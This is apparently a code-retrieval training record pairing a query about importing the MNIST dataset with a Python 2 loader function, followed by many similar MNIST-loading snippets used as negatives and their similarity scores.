= self.getCmdForReply(reply)\n r = Hub.Reply.Reply(cmd, reply['flag'], reply['KVs'])\n cmd.reply(r)" ]
[ "0.7024742", "0.67167115", "0.6706943", "0.65913546", "0.65091944", "0.645665", "0.62801105", "0.6189571", "0.61475736", "0.61325663", "0.60985357", "0.6096203", "0.6044156", "0.60315806", "0.60073096", "0.5959323", "0.5922411", "0.5920338", "0.5898053", "0.58856004", "0.58762634", "0.5848668", "0.58410114", "0.5833611", "0.58323646", "0.5800465", "0.57781124", "0.57568985", "0.5735574", "0.57206225", "0.56912935", "0.5672307", "0.5654508", "0.56540775", "0.56457525", "0.5624936", "0.56232643", "0.56024045", "0.5585292", "0.5563288", "0.55442834", "0.5534573", "0.5522905", "0.5518056", "0.55178267", "0.54953665", "0.5490357", "0.5489801", "0.5487323", "0.54811746", "0.547752", "0.54629546", "0.5435956", "0.5433821", "0.54317856", "0.542376", "0.54232526", "0.5410668", "0.5397383", "0.5397383", "0.5396413", "0.53749007", "0.5373544", "0.53695154", "0.5358311", "0.53104377", "0.5293652", "0.5292779", "0.52803916", "0.52784777", "0.5259668", "0.5247011", "0.5246572", "0.5243747", "0.5242254", "0.52316326", "0.5219219", "0.521689", "0.5216288", "0.52117217", "0.52113163", "0.52024156", "0.51961935", "0.51823205", "0.5177129", "0.5175851", "0.5164744", "0.51629525", "0.51615876", "0.51612467", "0.51582956", "0.51511025", "0.51479274", "0.5144471", "0.5141685", "0.513971", "0.5123366", "0.51168084", "0.51100945", "0.5099052", "0.5096546" ]
0.0
-1
Python function for importing the MNIST data set. It returns an iterator of 2tuples with the first element being the label and the second element being a numpy.uint8 2D array of pixel data for the given image.
def read(dataset = "training", path = "."): if dataset is "training": fname_img = os.path.join(path, 'train-images-idx3-ubyte') fname_lbl = os.path.join(path, 'train-labels-idx1-ubyte') elif dataset is "testing": fname_img = os.path.join(path, 't10k-images-idx3-ubyte') fname_lbl = os.path.join(path, 't10k-labels-idx1-ubyte') else: raise ValueError, "dataset must be 'testing' or 'training'" # Load everything in some numpy arrays with open(fname_lbl, 'rb') as flbl: magic, num = struct.unpack(">II", flbl.read(8)) lbl = np.fromfile(flbl, dtype=np.int8) with open(fname_img, 'rb') as fimg: magic, num, rows, cols = struct.unpack(">IIII", fimg.read(16)) img = np.fromfile(fimg, dtype=np.uint8).reshape(len(lbl), rows, cols) get_img = lambda idx: (lbl[idx], img[idx]) # Create an iterator which returns each image in turn for i in xrange(len(lbl)): yield get_img(i)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def readmnist(dataset = \"training\", path = \".\"):\n\n if dataset is \"training\":\n fname_img = os.path.join(path, 'train-images.idx3-ubyte')\n fname_lbl = os.path.join(path, 'train-labels.idx1-ubyte')\n elif dataset is \"testing\":\n fname_img = os.path.join(path, 't10k-images.idx3-ubyte')\n fname_lbl = os.path.join(path, 't10k-labels.idx1-ubyte')\n # else:\n # raise ValueError, \"dataset must be 'testing' or 'training'\"\n\n # Load everything in some numpy arrays\n with open(fname_lbl, 'rb') as flbl:\n magic, num = struct.unpack(\">II\", flbl.read(8))\n lbl = np.fromfile(flbl, dtype=np.int8)\n\n with open(fname_img, 'rb') as fimg:\n magic, num, rows, cols = struct.unpack(\">IIII\", fimg.read(16))\n img = np.fromfile(fimg, dtype=np.uint8).reshape(len(lbl), rows, cols)\n\n get_img = lambda idx: (lbl[idx], img[idx])\n\n # Create an iterator which returns each image in turn\n for i in xrange(len(lbl)):\n yield get_img(i)", "def train_data() -> Iterator[Tuple[Label, ChanneledImage]]:\n return zip(*get_data(TRAIN_FILES, 60000))", "def readMNISTData():\n mnist = input_data.read_data_sets(\"MNIST_data\",one_hot=True) \n return mnist", "def mnist(path):\n with open(path, 'r') as f:\n for line in f:\n data = line.strip().split(',')\n\n # Label is a vector with one element per class\n label = [0.0] * 10\n label[int(data[0])] = 1.0 \n\n # The data are images of 28x28 pixels\n image_array = np.asfarray(data[1:]).reshape((28, 28))\n # Normalize the pictures \n image_array = image_array / 255.0\n\n #plt.imshow(image_array, cmap='Greys', interpolation='None')\n yield (image_array, label)", "def test_data() -> Iterator[Tuple[Label, ChanneledImage]]:\n return zip(*get_data(TEST_FILES, 10000))", "def load_mnist(dataset=\"training\", digits=np.arange(10), path=\".\"):\n\n if dataset == \"training\":\n fname_img = os.path.join(path, 'train-images-idx3-ubyte')\n fname_lbl = os.path.join(path, 'train-labels-idx1-ubyte')\n elif dataset == \"testing\":\n fname_img = os.path.join(path, 't10k-images-idx3-ubyte')\n fname_lbl = os.path.join(path, 't10k-labels-idx1-ubyte')\n else:\n raise ValueError(\"dataset must be 'testing' or 'training'\")\n\n flbl = open(fname_lbl, 'rb')\n magic_nr, size = struct.unpack(\">II\", flbl.read(8))\n lbl = pyarray(\"b\", flbl.read())\n flbl.close()\n\n fimg = open(fname_img, 'rb')\n magic_nr, size, rows, cols = struct.unpack(\">IIII\", fimg.read(16))\n img = pyarray(\"B\", fimg.read())\n fimg.close()\n\n ind = [ k for k in range(size) if lbl[k] in digits ]\n N = len(ind)\n\n images = zeros((N, rows, cols), dtype=uint8)\n labels = zeros((N, 1), dtype=int8)\n for i in range(len(ind)):\n images[i] = array(img[ ind[i]*rows*cols : (ind[i]+1)*rows*cols ]).reshape((rows, cols))\n labels[i] = lbl[ind[i]]\n\n return images, labels", "def as_mnist(filename, imwidth):\n\n images = []\n labels = []\n \n if filename.find(\"devel\") != -1:\n print(\"we're working with the development set: \" + filename)\n\n for cls, data in enumerate(load(filename)):\n for example in data:\n labels.append(cls)\n image = numpy.zeros(shape=(imwidth, imwidth), dtype='uint8')\n for (x, y) in example:\n x_ = int(round(imwidth * x))\n y_ = int(round(1-(imwidth * y)))\n image[y_, x_] = 255\n images.append(image.flatten())\n\n return numpy.vstack(images).T.copy(), numpy.array(labels)", "def mnist(path):\n with open(path, 'r') as f:\n for line in f:\n data = line.strip().split(',')\n\n # Label is a vector with one element per class\n label = [0.01] * 10\n label[int(data[0])] = 0.99\n\n # The data are images of 28x28 pixels\n #image_array = np.asfarray(data[1:]).reshape((28, 28))\n image_array = np.asfarray(data[1:])\n # Normalize all values between [0.01, 1.0]\n image_array = ((image_array) / 255.0 * 0.99) + 0.01\n\n #plt.imshow(image_array, cmap='Greys', interpolation='None')\n yield (image_array, label)", "def MNIST_data():\n\n # Pobieramy macierze numpy z cyframi\n # images[i,j,k] <=> piksel (j,k) z i-tego obrazka w zbiorze danych\n images, labels = get_MNIST_dataset(range(10), \"training\") #pierwszy argument to\n\n # a) Ilosc przykladow i rozmiary danych\n print \"Raw training data dimensions \", images.shape\n print \"Labels dimensions \",labels.shape\n\n # b) Ile jest cyfr 2?\n print \"Counting 2 in training dataset \",len(filter(lambda x: x == 2, labels))\n\n # c) Jaki jest sredni obrazek 2 ? (Usrednienie wszystkich macierzy ktore sa 2)\n\n #1. Pobierzmy wszystkie dwojki, fajny sposob indeksowania\n print labels == 2\n only_2 = images[labels == 2, :, :]\n print \"Checking number of 2s \", only_2.shape\n\n #2. TODO: Usrednienie (matrix.mean moze byc przydatne)\n\n #3. TODO: narysowanie usrednionej cyfry (zobacz pl.imshow)\n\n # d) Ostatnie - przetworzmy ostatnia cyfre do 1 wymiarowego wektora\n vectorized = np.reshape(images[-1], newshape=(images[-1].shape[0]*images[-1].shape[1]))\n print \"Vectorized last digit \", vectorized", "def extract_images(f):\n\tprint('Extracting', f.name)\n\twith gzip.GzipFile(fileobj=f) as bytestream:\n\t\tmagic = _read32(bytestream)\n\t\tif magic != 2051:\n\t\t\traise ValueError('Invalid magic number %d in MNIST image file: %s' %\n\t\t\t\t\t\t\t\t\t\t\t (magic, f.name))\n\t\tnum_images = _read32(bytestream)\n\t\trows = _read32(bytestream)\n\t\tcols = _read32(bytestream)\n\t\tbuf = bytestream.read(rows * cols * num_images)\n\t\tdata = numpy.frombuffer(buf, dtype=numpy.uint8)\n\t\tdata = data.reshape(num_images, rows, cols, 1)\n\t\treturn data", "def _extract_images(self, filename):\n log.info('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = self._read32(bytestream)\n if magic != 2051:\n raise ValueError(\n 'Invalid magic number %d in MNIST image file: %s' %\n (magic, filename))\n num_images = self._read32(bytestream)\n rows = self._read32(bytestream)\n cols = self._read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = np.frombuffer(buf, dtype=np.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def load_data():\n\n \"\"\"The ``training_data`` is returned as a tuple with two entries.\n The first entry contains the actual training images. This is a\n numpy ndarray with 50,000 entries. Each entry is, in turn, a\n numpy ndarray with 784 values, representing the 28 * 28 = 784\n pixels in a single MNIST image.\"\"\"\n\n \"\"\"The second entry in the ``training_data`` tuple is a numpy ndarray\n containing 50,000 entries. Those entries are just the digit\n values (0...9) for the corresponding images contained in the first\n entry of the tuple.\"\"\"\n\n \"\"\"The ``validation_data`` and ``test_data`` are similar, except\n each contains only 10,000 images.\"\"\"\n f = gzip.open('MNIST/data/mnist.pkl.gz', 'rb')\n training_data, validation_data, test_data = Pickle.load(f, encoding='bytes'\n )\n f.close()\n return (training_data, validation_data, test_data)", "def load_mnist(path, kind='train'):\n '''ref: http://yann.lecun.com/exdb/mnist/ '''\n ''' each hand write is 28x28 = 784, a 1 dim vector'''\n labels_path = os.path.join(path,\n '%s-labels-idx1-ubyte'\n % kind)\n images_path = os.path.join(path,\n '%s-images-idx3-ubyte'\n % kind)\n\n # check the offical doc to know how to extract the content\n '''\n [offset] [type] [value] [description]\n 0000 32 bit integer 0x00000801(2049) magic number (MSB first)\n 0004 32 bit integer 60000 number of items\n 0008 unsigned byte ?? label\n 0009 unsigned byte ?? label\n ........\n xxxx unsigned byte ?? label\n The labels values are 0 to 9.\n '''\n with open(labels_path, 'rb') as lbpath:\n magic, n = struct.unpack('>II',\n lbpath.read(8))\n labels = np.fromfile(lbpath,\n dtype=np.uint8)\n\n '''\n [offset] [type] [value] [description]\n 0000 32 bit integer 0x00000803(2051) magic number\n 0004 32 bit integer 60000 number of images\n 0008 32 bit integer 28 number of rows\n 0012 32 bit integer 28 number of columns\n 0016 unsigned byte ?? pixel\n 0017 unsigned byte ?? pixel\n ........\n xxxx unsigned byte ?? pixel\n Pixels are organized row-wise. Pixel values are 0 to 255. 0 means background (white), 255 means foreground (black).\n '''\n with open(images_path, 'rb') as imgpath:\n magic, num, rows, cols = struct.unpack(\">IIII\",\n imgpath.read(16))\n ''' each hand write is 28x28 = 784, a 1 dim vector'''\n images = np.fromfile(imgpath,\n dtype=np.uint8).reshape(len(labels), 784)\n\n return images, labels", "def load_mnist(kind='train'):\r\n with open('%s-labels.idx1-ubyte' % kind, 'rb') as lbpath:\r\n magic, n = struct.unpack('>II', lbpath.read(8))\r\n labels = np.fromfile(lbpath, dtype=np.uint8)\r\n\r\n with open('%s-images.idx3-ubyte' % kind, 'rb') as imgpath:\r\n magic, num, rows, cols = struct.unpack('>IIII', imgpath.read(16))\r\n images = np.fromfile(imgpath, dtype=np.uint8).reshape(len(labels), 784)\r\n\r\n return images, labels", "def import_mnist():\n\turl_mnist = \"http://deeplearning.net/data/mnist/mnist.pkl.gz\"\n\tfile_name = \"mnist.pkl.gz\"\n\twork_directory = \"mnist\"\n\tfile_path = maybe_download(url=url_mnist, file_name=file_name, work_directory=work_directory)\n\n\timport pickle\n\twith gzip.open(file_path,'rb') as ff :\n\t\tu = pickle._Unpickler( ff )\n\t\tu.encoding = 'latin1'\n\t\ttrain, val, test = u.load()\n\t\ttrainX = np.array(train[0])\n\t\ttrainY = np.reshape(train[1], [50000, 1])\n\t\tvalX = np.array(val[0])\n\t\tvalY = np.reshape(val[1], [10000, 1])\n\t\ttestX = np.array(test[0])\n\t\ttestY = np.reshape(test[1], [10000, 1])\n\t\ttrainX = np.concatenate((trainX, valX), axis = 0)\n\t\ttrainY = np.concatenate((trainY, valY), axis = 0)\n\treturn trainX, trainY, testX, testY", "def extract_images(f):\n print('Extracting', f.name)\n with gzip.GzipFile(fileobj=f) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError('Invalid magic number %d in MNIST image file: %s' %(magic, f.name))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = np.frombuffer(buf, dtype=np.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def import_minimias_dataset(data_dir: str, label_encoder) -> (np.ndarray, np.ndarray):\n # Initialise variables.\n images = list()\n labels = list()\n\n if not config.is_roi:\n # Loop over the image paths and update the data and labels lists with the pre-processed images & labels.\n print(\"Loading whole images\")\n for image_path in list(paths.list_images(data_dir)):\n images.append(preprocess_image(image_path))\n labels.append(image_path.split(os.path.sep)[-2]) # Extract label from path.\n else:\n # Use the CSV file to get the images and their labels, and crop the images around the specified ROI.\n print(\"Loading cropped ROI images\")\n images, labels = crop_roi_image(data_dir)\n\n # Convert the data and labels lists to NumPy arrays.\n images = np.array(images, dtype=\"float32\") # Convert images to a batch.\n labels = np.array(labels)\n\n # Encode labels.\n labels = encode_labels(labels, label_encoder)\n\n return images, labels", "def extract_images(f):\n print('Extracting', f.name)\n with gzip.GzipFile(fileobj=f) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError('Invalid magic number %d in MNIST image file: %s' %\n (magic, f.name))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = np.frombuffer(buf, dtype=np.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def extract_images(f):\n print('Extracting', f.name)\n with gzip.GzipFile(fileobj=f) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError('Invalid magic number %d in MNIST image file: %s' %\n (magic, f.name))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = np.frombuffer(buf, dtype=np.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def load_mnist(path, kind='train'):\n labels_path = os.path.join(path,'%s-labels-idx1-ubyte.gz'% kind)\n\n images_path = os.path.join(path,'%s-images-idx3-ubyte.gz'% kind)\n\n with gzip.open(labels_path, 'rb') as lbpath:\n labels = np.frombuffer(lbpath.read(), dtype=np.uint8,offset=8)\n\n with gzip.open(images_path, 'rb') as imgpath:\n images = np.frombuffer(imgpath.read(), dtype=np.uint8,offset=16).reshape(len(labels), 784)\n\n print(\"Dataset Loaded\")\n \n return images, labels", "def get_labeled_data(imagefile, labelfile):\n # Open the images with gzip in read binary mode\n images = open(imagefile, 'rb')\n labels = open(labelfile, 'rb')\n\n # Read the binary data\n # We have to get big endian unsigned int. So we need '>I'\n\n # Get metadata for images\n images.read(4) # skip the magic_number\n number_of_images = images.read(4)\n number_of_images = unpack('>I', number_of_images)[0]\n rows = images.read(4)\n rows = unpack('>I', rows)[0]\n cols = images.read(4)\n cols = unpack('>I', cols)[0]\n\n # Get metadata for labels\n labels.read(4) # skip the magic_number\n N = labels.read(4)\n N = unpack('>I', N)[0]\n\n if number_of_images != N:\n raise Exception('number of labels did not match the number of images')\n\n # Get the data\n X = np.zeros((N, rows * cols), dtype=np.uint8) # Initialize numpy array\n y = np.zeros(N, dtype=np.uint8) # Initialize numpy array\n for i in range(N):\n for id in range(rows * cols):\n tmp_pixel = images.read(1) # Just a single byte\n tmp_pixel = unpack('>B', tmp_pixel)[0]\n X[i][id] = tmp_pixel\n tmp_label = labels.read(1)\n y[i] = unpack('>B', tmp_label)[0]\n return (X, y)", "def get_labeled_data(imagefile, labelfile):\n # Open the images with gzip in read binary mode\n images = open(imagefile, 'rb')\n labels = open(labelfile, 'rb')\n\n # Read the binary data\n # We have to get big endian unsigned int. So we need '>I'\n\n # Get metadata for images\n images.read(4) # skip the magic_number\n number_of_images = images.read(4)\n number_of_images = unpack('>I', number_of_images)[0]\n rows = images.read(4)\n rows = unpack('>I', rows)[0]\n cols = images.read(4)\n cols = unpack('>I', cols)[0]\n\n # Get metadata for labels\n labels.read(4) # skip the magic_number\n N = labels.read(4)\n N = unpack('>I', N)[0]\n\n if number_of_images != N:\n raise Exception('number of labels did not match the number of images')\n\n # Get the data\n X = np.zeros((N, rows * cols), dtype=np.uint8) # Initialize numpy array\n y = np.zeros(N, dtype=np.uint8) # Initialize numpy array\n for i in range(N):\n for id in range(rows * cols):\n tmp_pixel = images.read(1) # Just a single byte\n tmp_pixel = unpack('>B', tmp_pixel)[0]\n X[i][id] = tmp_pixel\n tmp_label = labels.read(1)\n y[i] = unpack('>B', tmp_label)[0]\n return (X, y)", "def extract_images(f):\n print('Extracting', f.name)\n with gzip.GzipFile(fileobj=f) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError('Invalid magic number %d in MNIST image file: %s' %\n (magic, f.name))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = numpy.frombuffer(buf, dtype=numpy.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def extract_images(f):\n with gzip.GzipFile(fileobj=f) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError('Invalid magic number %d in MNIST image file: %s' %\n (magic, f.name))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = numpy.frombuffer(buf, dtype=numpy.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def mnist_training():\n mndata = MNIST(MNIST_PATH)\n train_ims, train_labels = mndata.load_training()\n train_X = np.array(train_ims).T\n train_y = np.array(train_labels).T\n return train_X, train_y", "def load_fashion_mnist():\n # List of image file names\n dataset_directory = os.path.join(root_directory,'Fashion_MNIST')\n filenames = os.listdir(dataset_directory)\n filenames.sort()\n\n # List of numpy array; each row is a Image of the dataset\n data = []\n\n # Numpy array of labels associated to each class of image\n target = np.empty([len(filenames), ])\n\n previous_label = ''\n class_num = -1\n index = 0\n\n for index, filename in enumerate(filenames):\n data.append(Bitmap(io.imread(os.path.join(dataset_directory, filename))))\n file_label = filename.split('-')[0]\n\n if(previous_label != file_label):\n previous_label = file_label\n class_num += 1\n target[index] = class_num\n else:\n target[index] = class_num\n\n return {'bitmaps': data, 'targets': target}", "def load_MNIST_data():\n mnist = input_data.read_data_sets('data', one_hot=True)\n return {'train': mnist.train.images,\n 'validation': mnist.validation.images,\n 'test': mnist.test.images}", "def extract_images(filename):\n\tprint('Extracting', filename)\n\twith gzip.open(filename) as bytestream:\n\t\tmagic = _read32(bytestream)\n\t\tif magic != 2051:\n\t\t\traise ValueError('Invalid magic number %d in MNIST image file: %s' %(magic, filename))\n\t\tnum_images = _read32(bytestream)\n\t\trows = _read32(bytestream)\n\t\tcols = _read32(bytestream)\n\t\tbuf = bytestream.read(rows * cols * num_images)\n\t\tdata = numpy.frombuffer(buf, dtype=numpy.uint8)\n\t\tdata = data.reshape(num_images, rows, cols, 1)\n\t\treturn data", "def extract_images(filename):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError(\n 'Invalid magic number %d in MNIST image file: %s' %\n (magic, filename))\n num_images = _read32(bytestream)[0]\n rows = _read32(bytestream)[0]\n cols = _read32(bytestream)[0]\n #print('check', magic, num_images, rows, cols, rows * cols * num_images)\n buf = bytestream.read(rows * cols * num_images)\n data = numpy.frombuffer(buf, dtype=numpy.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def unpack_data(imagefile, labelfile):\n\t# Open the images with gzip in read binary mode\n\timages = open(imagefile, 'rb')\n\tlabels = open(labelfile, 'rb')\n\t# Read the binary data\n\t# We have to get big endian unsigned int. So we need '>I'\n\t# Get metadata for images\n\timages.read(4) # skip the magic_number\n\tnumber_of_images = images.read(4)\n\tnumber_of_images = unpack('>I', number_of_images)[0]\n\trows = images.read(4)\n\trows = unpack('>I', rows)[0]\n\tcols = images.read(4)\n\tcols = unpack('>I', cols)[0]\n\n\t# Get metadata for labels\n\tlabels.read(4) # skip the magic_number\n\tN = labels.read(4)\n\tN = unpack('>I', N)[0]\n\n\tif number_of_images != N:\n\t\traise Exception('number of labels did not match the number of images')\n\t# Get the data\n\tx = zeros((N, rows, cols), dtype=float32) # Initialize numpy array\n\ty = zeros((N, 1), dtype=uint8) # Initialize numpy array\n\tfor i in range(N):\n\t\tif i % 1000 == 0:\n\t\t\tprint(\"i: %i\" % i)\n\t\tfor row in range(rows):\n\t\t\tfor col in range(cols):\n\t\t\t\ttmp_pixel = images.read(1) # Just a single byte\n\t\t\t\ttmp_pixel = unpack('>B', tmp_pixel)[0]\n\t\t\t\tx[i][row][col] = tmp_pixel\n\t\ttmp_label = labels.read(1)\n\t\ty[i] = unpack('>B', tmp_label)[0]\n\treturn x, y", "def load_mnsit_training_set():\n try:\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n train_data = np.asarray(x_train, dtype=np.float32)\n eval_data = np.asarray(x_test, dtype=np.float32)\n train_labels = np.asarray(y_train, dtype=np.int32)\n eval_labels = np.asarray(y_test, dtype=np.int32)\n return train_data, eval_data, train_labels, eval_labels\n\n except Exception as error:\n raise EnvironmentError(\"load_mnsit_training_set: Exception loading MNSIT data: {0}\".format(error))", "def _load_mnist(path, dataset=\"training\", digits=None, asbytes=False,\n selection=None, return_labels=True, return_indices=False):\n\n # The files are assumed to have these names and should be found in 'path'\n files = {\n 'training': ('train-images-idx3-ubyte', 'train-labels-idx1-ubyte'),\n 'testing': ('t10k-images-idx3-ubyte', 't10k-labels-idx1-ubyte'),\n }\n\n try:\n images_fname = os.path.join(path, files[dataset][0])\n labels_fname = os.path.join(path, files[dataset][1])\n except KeyError:\n raise ValueError(\"Data set must be 'testing' or 'training'\")\n\n # We can skip the labels file only if digits aren't specified and labels\n # aren't asked for\n if return_labels or digits is not None:\n flbl = open(labels_fname, 'rb')\n magic_nr, size = struct.unpack(\">II\", flbl.read(8))\n labels_raw = pyarray(\"b\", flbl.read())\n flbl.close()\n\n fimg = open(images_fname, 'rb')\n magic_nr, size, rows, cols = struct.unpack(\">IIII\", fimg.read(16))\n images_raw = pyarray(\"B\", fimg.read())\n fimg.close()\n\n if digits:\n indices = [k for k in range(size) if labels_raw[k] in digits]\n else:\n indices = range(size)\n\n if selection:\n indices = indices[selection]\n\n images = np.zeros((len(indices), rows, cols), dtype=np.uint8)\n\n if return_labels:\n labels = np.zeros((len(indices)), dtype=np.int8)\n for i in range(len(indices)):\n images[i] = np.array(images_raw[indices[i] * rows * cols:(indices[i] + 1) * rows * cols]).reshape((rows, cols))\n if return_labels:\n labels[i] = labels_raw[indices[i]]\n\n if not asbytes:\n images = images.astype(float)/255.0\n\n ret = (images,)\n if return_labels:\n ret += (labels,)\n if return_indices:\n ret += (indices,)\n\n if len(ret) == 1:\n return ret[0] # Don't return a tuple of one\n\n return ret", "def extract_images(filename):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError(\n 'Invalid magic number %d in MNIST image file: %s' %\n (magic, filename))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = np.frombuffer(buf, dtype=np.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def read_mnist_labels(filename):\n with gzip.open(filename, 'rb') as f:\n magic, _ = struct.unpack('>ii', f.read(8))\n if magic != MNIST_LABEL_MAGIC:\n raise ValueError(\"Wrong magic number reading MNIST label file\")\n array = numpy.frombuffer(f.read(), dtype='uint8')\n array = array.reshape(array.size, 1)\n return array", "def load_dataset():\n temp = gzip.open('mnist.pkl.gz')\n train, val , test = pickle.load(temp,encoding='latin1')\n temp.close()\n train_inp = [np.reshape(x, (784,1)) for x in train[0]]\n train_outp = [one_hot(y) for y in train[1]]\n training_data = zip(train_inp, train_outp)\n validation_inp = [np.reshape(x, (784, 1)) for x in val[0]]\n validation_data = zip(validation_inp, val[1])\n test_inp = [np.reshape(x, (784, 1)) for x in test[0]]\n test_data = zip(test_inp, test[1])\n return (training_data,validation_data,test_data)", "def read_gz(images,labels):\n\t# Open the images with gzip in read binary mode\n\t# images = gzip.open('../MNIST-data/train-images-idx3-ubyte.gz', 'rb')\n\t# labels = gzip.open('../MNIST-data/train-labels-idx1-ubyte.gz', 'rb')\n\n\t# Read the binary data\n\n\t# We have to get big endian unsigned int. So we need '>I'\n\n\t# Get metadata for images\n\timages.read(4) # skip the magic_number\n\tnumber_of_images = images.read(4)\n\tnumber_of_images = unpack('>I', number_of_images)[0]\n\trows = images.read(4)\n\trows = unpack('>I', rows)[0]#28\n\tcols = images.read(4)\n\tcols = unpack('>I', cols)[0]#28\n\n\t# Get metadata for labels\n\tlabels.read(4) # skip the magic_number\n\tN = labels.read(4)\n\tN = unpack('>I', N)[0] #60000\n\t# print(number_of_images);\n\n\tif number_of_images != N:\n\t raise Exception('number of labels did not match the number of images')\n\n\t# Get the data\n\tx = zeros((N, rows, cols), dtype=float32) # Initialize numpy array #60000X28X28\n\ty = zeros((N, 1), dtype=uint8) # Initialize numpy array\n\tfor i in range(N):\n\t if i % 1000 == 0:\n\t print(\"i: %i\" % i)\n\t for row in range(rows):\n\t for col in range(cols):\n\t tmp_pixel = images.read(1) # Just a single byte\n\t tmp_pixel = unpack('>B', tmp_pixel)[0]\n\t x[i][row][col] = tmp_pixel\n\t tmp_label = labels.read(1)\n\t y[i] = unpack('>B', tmp_label)[0]\n\t # print(y.shape)#60000X1\n\treturn (x, y)", "def load_mnist(path, kind = 'train'):\n label_path = os.path.join(path, '%s-labels-idx1-ubyte' % kind)\n images_path = os.path.join(path, '%s-images-idx3-ubyte' % kind)\n\n\n with open(label_path, 'rb') as lbpath:\n magic, n = struct.unpack('>II', lbpath.read(8))\n\n labels = np.fromfile(lbpath, dtype= np.uint8)\n\n with open(images_path, 'rb') as imgpath:\n magic, num, rows, cols = struct.unpack('>IIII', imgpath.read(16))\n\n images = np.fromfile(imgpath, dtype=np.uint8).reshape(len(labels),784)\n\n\n return images, labels", "def load_mnist_dataset(shape=(-1,784)):\n # We first define a download function, supporting both Python 2 and 3.\n if sys.version_info[0] == 2:\n from urllib import urlretrieve\n else:\n from urllib.request import urlretrieve\n\n def download(filename, source='http://yann.lecun.com/exdb/mnist/'):\n print(\"Downloading %s\" % filename)\n urlretrieve(source + filename, filename)\n\n # We then define functions for loading MNIST images and labels.\n # For convenience, they also download the requested files if needed.\n import gzip\n\n def load_mnist_images(filename):\n if not os.path.exists(filename):\n download(filename)\n # Read the inputs in Yann LeCun's binary format.\n with gzip.open(filename, 'rb') as f:\n data = np.frombuffer(f.read(), np.uint8, offset=16)\n # The inputs are vectors now, we reshape them to monochrome 2D images,\n # following the shape convention: (examples, channels, rows, columns)\n data = data.reshape(shape)\n # data = data.reshape(-1, 1, 28, 28) # for lasagne\n # data = data.reshape(-1, 28, 28, 1) # for tensorflow\n # data = data.reshape(-1, 784) # for tensorflow\n # The inputs come as bytes, we convert them to float32 in range [0,1].\n # (Actually to range [0, 255/256], for compatibility to the version\n # provided at http://deeplearning.net/data/mnist/mnist.pkl.gz.)\n return data / np.float32(256)\n\n def load_mnist_labels(filename):\n if not os.path.exists(filename):\n download(filename)\n # Read the labels in Yann LeCun's binary format.\n with gzip.open(filename, 'rb') as f:\n data = np.frombuffer(f.read(), np.uint8, offset=8)\n # The labels are vectors of integers now, that's exactly what we want.\n return data\n\n # We can now download and read the training and test set images and labels.\n ## you may want to change the path\n data_dir = '' #os.getcwd() + '/lasagne_tutorial/'\n # print('data_dir > %s' % data_dir)\n\n X_train = load_mnist_images(data_dir+'train-images-idx3-ubyte.gz')\n y_train = load_mnist_labels(data_dir+'train-labels-idx1-ubyte.gz')\n X_test = load_mnist_images(data_dir+'t10k-images-idx3-ubyte.gz')\n y_test = load_mnist_labels(data_dir+'t10k-labels-idx1-ubyte.gz')\n\n # We reserve the last 10000 training examples for validation.\n X_train, X_val = X_train[:-10000], X_train[-10000:]\n y_train, y_val = y_train[:-10000], y_train[-10000:]\n\n ## you may want to plot one example\n # print('X_train[0][0] >', X_train[0][0].shape, type(X_train[0][0])) # for lasagne\n # print('X_train[0] >', X_train[0].shape, type(X_train[0])) # for tensorflow\n # # exit()\n # # [[..],[..]] (28, 28) numpy.ndarray\n # # plt.imshow 只支持 (28, 28)格式,不支持 (1, 28, 28),所以用 [0][0]\n # fig = plt.figure()\n # #plotwindow = fig.add_subplot(111)\n # # plt.imshow(X_train[0][0], cmap='gray') # for lasagne (-1, 1, 28, 28)\n # plt.imshow(X_train[0].reshape(28,28), cmap='gray') # for tensorflow (-1, 28, 28, 1)\n # plt.title('A training image')\n # plt.show()\n\n # We just return all the arrays in order, as expected in main().\n # (It doesn't matter how we do this as long as we can read them again.)\n return X_train, y_train, X_val, y_val, X_test, y_test", "def read_mnist_images(filename, dtype=None):\n with gzip.open(filename, 'rb') as f:\n magic, number, rows, cols = struct.unpack('>iiii', f.read(16))\n if magic != MNIST_IMAGE_MAGIC:\n raise ValueError(\"Wrong magic number reading MNIST image file\")\n array = numpy.frombuffer(f.read(), dtype='uint8')\n array = array.reshape((number, 1, rows, cols))\n if dtype:\n dtype = numpy.dtype(dtype)\n\n if dtype.kind == 'b':\n # If the user wants Booleans, threshold at half the range.\n array = array >= 128\n elif dtype.kind == 'f':\n # Otherwise, just convert.\n array = array.astype(dtype)\n array /= 255.\n else:\n raise ValueError(\"Unknown dtype to convert MNIST to\")\n return array", "def 